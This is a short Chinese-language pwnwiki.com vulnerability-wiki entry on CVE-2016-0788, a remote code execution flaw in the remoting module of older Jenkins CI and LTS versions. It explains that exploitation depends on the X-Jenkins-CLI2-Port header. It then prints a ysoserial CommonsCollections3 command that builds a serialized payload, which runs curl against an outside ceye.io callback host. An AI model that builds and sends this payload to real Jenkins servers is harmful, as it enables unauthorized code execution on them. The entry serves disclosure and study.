Loading
0

CVE-2016-0788 Jenkins CI和LTS 远程代码执行漏洞/zh-hant

pwnwiki.com

,

简介

CloudBeesJenkinsCI1.650之前版本和LTS1.642.2之前版本的remoting模块中存在安全漏洞。远程攻击者可通过打开JRMP监听程序利用该漏洞执行任意代码。

利用需要X-Jenkins-CLI2-Port对应的端口,如果Jenkins无法获取CLI版本2的端口标头X-Jenkins-CLI2-Port它会退回到版本1。

利用ys生成二进制文件

java -jar ysoserial.jar CommonsCollections3 "curl http://r9rub4.ceye.io/" > payload.bin

PWNWIK.COM==免费、自由、人人可编辑的漏洞库